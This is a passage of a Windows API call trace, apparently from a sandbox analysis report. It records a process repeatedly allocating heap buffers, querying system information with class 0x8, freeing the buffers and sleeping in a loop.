ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.626] Sleep (dwMilliseconds=0x110) [0199.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.642] Sleep (dwMilliseconds=0x110) [0199.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.658] Sleep (dwMilliseconds=0x110) [0199.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.673] Sleep (dwMilliseconds=0x110) [0199.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.714] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.715] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.715] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.715] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.717] Sleep (dwMilliseconds=0x110) [0199.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.737] Sleep (dwMilliseconds=0x110) [0199.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.767] Sleep (dwMilliseconds=0x110) [0199.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.782] Sleep (dwMilliseconds=0x110) [0199.806] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.806] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.807] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.807] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.807] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.807] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.807] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.807] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.808] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.808] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.808] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.808] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.810] Sleep (dwMilliseconds=0x110) [0199.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.829] Sleep (dwMilliseconds=0x110) [0199.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.845] Sleep (dwMilliseconds=0x110) [0199.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.862] Sleep (dwMilliseconds=0x110) [0199.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.877] Sleep (dwMilliseconds=0x110) [0199.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.898] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.905] Sleep (dwMilliseconds=0x110) [0199.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 